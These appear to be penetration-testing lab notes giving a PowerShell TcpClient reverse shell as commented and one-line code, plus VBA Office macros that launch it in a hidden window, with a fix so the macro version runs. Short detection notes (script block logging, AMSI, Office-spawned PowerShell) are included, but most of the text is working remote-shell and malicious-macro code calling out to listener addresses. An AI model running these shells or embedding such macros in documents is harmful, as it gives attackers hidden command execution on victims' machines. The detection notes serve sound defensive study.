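# PowerShell TCP reverse shell — one-liners and VBA launchers (lab notes)

Authorized-engagement / lab material only. Everything below is the classic
`TcpClient` + `Invoke-Expression` reverse shell: the target connects *out* to a
listener, reads commands from the socket, runs them with `iex`, and writes the
output back followed by a fake `PS path> ` prompt.

Security-review notes that apply to every variant on this page:

- **Cleartext.** Commands and output cross the network unencrypted over plain
  TCP; the `PS C:\...> ` prompt string in the response is a well-known NIDS
  signature.
- **No authentication.** Whatever is listening on `host:port` when the client
  connects gets arbitrary code execution in the user's context via
  `Invoke-Expression`. Do not leave a listener up on a shared network.
- **Host telemetry.** PowerShell Script Block Logging (Event ID 4104) records
  the script and the text handed to `Invoke-Expression`; AMSI scans it on
  current Windows; process-creation logging (4688 / Sysmon EID 1) captures the
  full `powershell.exe` command line. In the macro variants the parent process
  is the Office application, which is a widely used hunting rule.
- **Buffering.** The receive buffer is 64 KiB and the loop decodes each
  `Read()` as ASCII; a command larger than one read is split across
  iterations, and non-ASCII bytes are mangled.
- **Session lifetime.** The loop ends only when `Read()` returns 0 (listener
  closed). There is no `try/finally`, so the socket is closed only on the
  normal exit path; a terminating error raised by a remote command is likely to
  propagate out of the loop and end the session — confirm in the lab.

## One-liner (expanded and commented)

```powershell
# Connect back to the listener (replace X with the listener host octet).
$client = New-Object System.Net.Sockets.TCPClient('172.16.95.X',4444)
$stream = $client.GetStream()

# 64 KiB zero-filled receive buffer.
[byte[]]$bytes = 0..65535|%{0}

# Read() returns 0 when the remote side closes the connection.
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    # Decode exactly the bytes received on this read as ASCII.
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)

    # Execute the received text in a dot-sourced script block, merging stderr
    # into stdout so error text is also sent back.
    $sendback = (iex ". { $data } 2>&1" | Out-String )

    # Append a pseudo-prompt showing the current directory.
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
```

Same logic as a single line (the form used when pasting into a command field):

```powershell
$client = New-Object System.Net.Sockets.TCPClient('172.16.95.X',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()
```

## Running a saved script

```shell
powershell.exe -NoExit -ExecutionPolicy Bypass -File .\ton_script.ps1
```

`-ExecutionPolicy Bypass` only affects the current process; execution policy is
a safety setting, not a security boundary, so this is not an "exploit" — but
the flag itself is a common detection keyword in command-line logging.

## Variant: listener on port 80

Identical to the first one-liner apart from host and port (`10.10.10.10:80`,
presumably because outbound 80 is usually permitted — the traffic is still not
HTTP and still cleartext):

```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

## VBA launchers (Office macro)

**Bug fixed here.** The original macros encoded the `iex` line as
`"$sendback = (iex ""."" { $data } 2>&1"" | Out-String );"`, which VBA turns
into `$sendback = (iex "." { $data } 2>&1" | Out-String );` — unbalanced quotes,
so PowerShell fails to parse the command and the shell never starts. Even with
balanced escaping, any literal `"` inside `psCommand` would be stripped by the
command-line parser when the whole thing is wrapped as
`-Command "& { ... }"`. The robust fix (already hinted at by the last line of
the original notes) is to drop the inner quoting entirely:
`$sendback = (Invoke-Expression $data 2>&1 | Out-String);`. The command
string is built in one helper so both launchers share the corrected text.

```vba
' Harmless demo: run a multi-statement PowerShell command from VBA.
Sub RunMultiLinePS_Inline()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell.exe -Command ""$msg = 'Hello'; $date = Get-Date; Write-Output $msg; Write-Output $date"""
    Set objShell = Nothing
End Sub

' Builds the reverse-shell command text. It must contain no double quotes,
' because LaunchHiddenPowerShell wraps it in -Command "& { ... }".
Private Function ReverseShellCommand() As String
    ReverseShellCommand = _
        "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & _
        "$stream = $client.GetStream();" & _
        "[byte[]]$bytes = 0..65535|%{0};" & _
        "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & _
        "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & _
        "$sendback = (Invoke-Expression $data 2>&1 | Out-String);" & _
        "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & _
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & _
        "$stream.Write($sendbyte,0,$sendbyte.Length);" & _
        "$stream.Flush()};" & _
        "$client.Close()"
End Function

' Starts powershell.exe with a hidden window (WindowStyle 0 on Run as well as
' -WindowStyle Hidden). waitForExit = True blocks the Office host until the
' shell session ends; False returns immediately.
' Detection note: parent = WINWORD/EXCEL, child = powershell.exe with
' "-WindowStyle Hidden -Command" — both the process tree and the command line
' are logged by 4688 / Sysmon EID 1.
Private Sub LaunchHiddenPowerShell(ByVal psCommand As String, ByVal waitForExit As Boolean)
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, waitForExit
    Set wsh = Nothing
End Sub

' Synchronous launcher: the macro (and the Office UI) hangs until the
' reverse shell disconnects.
Sub ExecuterReverseShell()
    LaunchHiddenPowerShell ReverseShellCommand(), True
End Sub

' Asynchronous launcher: returns immediately, leaving powershell.exe running
' in the background.
Sub ExecuterReverseShellAsync()
    LaunchHiddenPowerShell ReverseShellCommand(), False
End Sub
```

Quote-free replacement for the `iex` line, usable wherever the command is
embedded in another quoted string (VBA, a `-Command "..."` argument, etc.):

```powershell
$sendback = (Invoke-Expression $data 2>&1 | Out-String)
```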